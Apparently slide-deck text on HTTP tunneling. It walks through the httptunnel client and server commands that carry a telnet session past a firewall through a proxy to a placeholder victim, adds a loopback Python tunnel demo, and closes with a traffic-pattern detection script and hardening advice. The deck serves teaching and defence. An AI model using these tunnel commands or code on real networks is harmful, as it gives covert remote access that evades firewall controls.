2. What is HTTP Tunneling?
• HTTP tunneling is a technique in which communications using various network protocols are encapsulated in the HTTP protocol. It works because outbound HTTP is almost always permitted by the firewall and is rarely inspected in detail, so it is neither blocked outright nor easily told apart from legitimate web traffic.
• The HTTP protocol therefore acts as a wrapper for a channel that the tunneled network protocol uses to communicate. [Wikipedia]
3. What is it used for?
HTTP tunneling is used most often as a means of communication from network locations with restricted connectivity, typically behind NATs, firewalls or proxy servers, and usually by applications that lack native support for communicating under such restrictions. Blocking traffic initiated from outside the network, or blocking all network protocols except a few, is a common way to lock down a network against internal and external threats; HTTP tunneling is a way around exactly that kind of lockdown, because the few protocols left open nearly always include HTTP.
4. How does it work? Implementation
The application or host opens an HTTP connection to a mediator server, which acts as a relay for communications to and from the remote host.
Once the connection is established, the application talks to the mediator server using ordinary HTTP requests, but with the actual communication encapsulated inside those requests.
During the session the mediator server unwraps the actual data from each request before forwarding it to the remote host in question, and wraps the remote host's replies the same way on the way back.
5. The Attack Explained (HTTP TUNNEL EXPLOIT)
The httptunnel exploit consists of two components, a client and a server:
htc, which runs on the attacker's machine, and hts, which runs on the victim's server.
6. The Attack Explained (HTTP TUNNEL EXPLOIT)
httptunnel exploits the fact that most firewalls let HTTP through via a proxy: it creates a data tunnel across that proxy, and another service, such as telnet, is then used to send and receive data over the established connection.
7. The Attack Explained (HTTP TUNNEL EXPLOIT)
The tunnel is built from HTTP PUT and HTTP GET requests.
All data sent to the victim machine travels in the body of PUT requests, and data coming back from the victim is returned in the responses to GET requests.
8. Exploiting
Once installed on the target system, the server component is started so that it listens for tunnel traffic on port 8888 and hands whatever arrives to the local telnet service:
hts -F localhost:23 8888
On the attacker's machine the client listens on local port 2323 and reaches the victim through the HTTP proxy:
htc -F 2323 -P PROXY:8000 VICTIM:8888
Once a successful connection has been established, the attacker can issue commands to VICTIM on the telnet port through the HTTP proxy data tunnel with:
telnet localhost 2323
A direct telnet to VICTIM on port 23 was blocked by the firewall; the tunnel carries the same session inside proxied HTTP, which the firewall allows.
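As an added example (not part of the original slides and not the httptunnel source), the following Python script replays the exchange from slides 4 to 8 on loopback. A constructed echo service stands in for the telnet daemon on port 23, TunnelServer plays the part of hts, and send_through_tunnel plays the part of htc. The /tunnel path, the echo service and the use of ephemeral ports are assumptions made so the demo runs offline; the `seen` list records what an inspecting proxy or firewall would get to see of the session.

```python
"""Minimal htc/hts-style HTTP tunnel (added illustration, not httptunnel code).
Assumptions: path "/tunnel", an upper-casing echo service in place of telnet,
and 127.0.0.1 with ephemeral ports for every role."""
import http.client
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

TUNNEL_PATH = "/tunnel"  # assumed; httptunnel uses its own URLs


def start_echo_target() -> int:
    """Stand-in for the remote service (telnet on port 23 in the slides).
    Constructed for the demo: it upper-cases whatever it receives."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


class TunnelHandler(BaseHTTPRequestHandler):
    """hts side: PUT bodies are unwrapped onto the target socket,
    GET responses carry whatever the target sent back."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        payload = self.rfile.read(length)
        self.server.seen.append(("PUT", length))  # all a proxy log would show
        self.server.target.sendall(payload)       # unwrap and forward
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        try:
            data = self.server.target.recv(4096)
        except socket.timeout:
            data = b""                            # nothing pending from target
        self.server.seen.append(("GET", len(data)))
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


class TunnelServer(HTTPServer):
    """hts: an HTTP server holding one TCP connection to the tunneled service."""

    def __init__(self, target_port: int):
        super().__init__(("127.0.0.1", 0), TunnelHandler)
        self.target = socket.create_connection(("127.0.0.1", target_port))
        self.target.settimeout(2.0)
        self.seen = []


def send_through_tunnel(tunnel_port: int, app_bytes: bytes) -> bytes:
    """htc side: wrap application bytes in a PUT, then poll with a GET."""
    conn = http.client.HTTPConnection("127.0.0.1", tunnel_port, timeout=5)
    conn.request("PUT", TUNNEL_PATH, body=app_bytes,
                 headers={"Content-Type": "application/octet-stream"})
    conn.getresponse().read()
    conn.request("GET", TUNNEL_PATH)
    reply = conn.getresponse().read()
    conn.close()
    return reply


def demo():
    """Run the whole exchange on loopback; return (reply, proxy-view log)."""
    hts = TunnelServer(start_echo_target())
    threading.Thread(target=hts.serve_forever, daemon=True).start()
    try:
        reply = send_through_tunnel(hts.server_port, b"uname -a\r\n")
    finally:
        hts.shutdown()
        hts.target.close()
        hts.server_close()
    return reply, hts.seen


if __name__ == "__main__":
    print(demo())
```

Running it sends the constructed "command" through the tunnel and gets the echo back; the point to notice is the proxy's view in `seen`: one PUT and one GET of a few bytes each to a single URL, with nothing in the request line or headers that says telnet. That is why slide 9 has to look at traffic patterns rather than protocol signatures.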
9. Finding the exploit
Because the exploit uses a legitimate service to carry information across the network and the Internet, the protocol itself gives no indication that an exploit is occurring.
What to watch for instead is the pattern of use, in this case HTTP PUT requests being issued repeatedly from one source to one destination.
The request packets may be smaller and less frequent than normal HTTP proxy traffic to a web site, which is exactly what makes the tunnel hard to find and trace.
10. Recommendations
1. Ensure all servers are at the most current patch level to avoid root compromise.
2. Disable all unnecessary services on servers; use only secure login services, such as SSH.
3. Disable trust relationships with servers that can be reached through the firewall, such as those in a Demilitarized Zone (DMZ).
4. Conduct regular scans of servers on the full port range (1 through 65535).
5. Review firewall and proxy logs for unusual web access patterns from systems that do not normally operate as web clients.
6. Monitor for HTTP GET requests issued from systems that do not provide web services.
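The pattern described on slide 9 (repeated small PUT requests from one source to one destination, paired with GETs that fetch the replies) and the log review in recommendations 5 and 6 can be turned into a concrete check. The script below is an added example, not part of the slides: the proxy log format and every log line in it are constructed for the demo, and the thresholds are starting points to tune, not published values.

```python
"""Detection sketch for the PUT/GET tunnel pattern. Added example, not from the
slides: the log format and every log line below are constructed for the demo."""
import re
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Assumed proxy log format: "<epoch-seconds> <client-ip> <method> <url> <bytes>"
LINE_RE = re.compile(r"^(\d+) (\S+) ([A-Z]+) (\S+) (\d+)$")

# Constructed sample: a normal browser (10.0.0.5), a WebDAV upload (10.0.0.12)
# and an htc-style tunnel client (10.0.0.9) talking to one host on port 8888.
SAMPLE_LOG = """\
1700000000 10.0.0.5 GET http://www.example.com/index.html 18342
1700000001 10.0.0.5 GET http://www.example.com/style.css 4120
1700000001 10.0.0.5 GET http://www.example.com/logo.png 23310
1700000040 10.0.0.5 GET http://news.example.org/ 51200
1700000100 10.0.0.12 PUT http://dav.example.net/reports/q1.pdf 1048576
1700000130 10.0.0.12 PUT http://dav.example.net/reports/q2.pdf 524288
1700000300 10.0.0.12 PUT http://dav.example.net/reports/q3.pdf 2097152
1700000000 10.0.0.9 PUT http://203.0.113.7:8888/ 12
1700000002 10.0.0.9 GET http://203.0.113.7:8888/ 96
1700000005 10.0.0.9 PUT http://203.0.113.7:8888/ 9
1700000007 10.0.0.9 GET http://203.0.113.7:8888/ 140
1700000010 10.0.0.9 PUT http://203.0.113.7:8888/ 14
1700000012 10.0.0.9 GET http://203.0.113.7:8888/ 88
1700000015 10.0.0.9 PUT http://203.0.113.7:8888/ 7
1700000017 10.0.0.9 GET http://203.0.113.7:8888/ 120
"""


def parse_log(text):
    """Return (ts, client, method, host, bytes) tuples; skip malformed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, method, url, size = m.groups()
        records.append((int(ts), client, method, urlsplit(url).netloc, int(size)))
    return records


def find_tunnel_candidates(records, min_puts=3, max_put_bytes=64, max_jitter=1.0):
    """Flag (client, host) pairs whose PUT traffic looks like a tunnel rather
    than an upload: repeated tiny PUT bodies, a steady polling interval, and a
    GET following each PUT to collect the reply. Two of the three signs flag it."""
    by_pair = defaultdict(list)
    for rec in records:
        by_pair[(rec[1], rec[3])].append(rec)

    findings = []
    for (client, host), recs in by_pair.items():
        recs.sort()
        puts = [r for r in recs if r[2] == "PUT"]
        if len(puts) < min_puts:
            continue                       # uploads happen; one or two is noise
        reasons = []
        if max(r[4] for r in puts) <= max_put_bytes:
            reasons.append("small PUT bodies")
        gaps = [b[0] - a[0] for a, b in zip(puts, puts[1:])]
        if pstdev(gaps) <= max_jitter:
            reasons.append(f"regular PUT interval of about {mean(gaps):.0f}s")
        gets = sum(1 for r in recs if r[2] == "GET")
        if gets >= len(puts):
            reasons.append("each PUT paired with a GET (polling)")
        if len(reasons) >= 2:
            findings.append((client, host, reasons))
    return findings


if __name__ == "__main__":
    for client, host, why in find_tunnel_candidates(parse_log(SAMPLE_LOG)):
        print(f"{client} -> {host}: {', '.join(why)}")
```

On the sample data only 10.0.0.9 is flagged: the WebDAV client also issues PUTs, but its bodies are large, its timing is irregular and it never polls with GET, which is what keeps legitimate uploads out of the alert. In practice the per-pair aggregation is the useful part; the thresholds need tuning against your own proxy's baseline before the rule goes live.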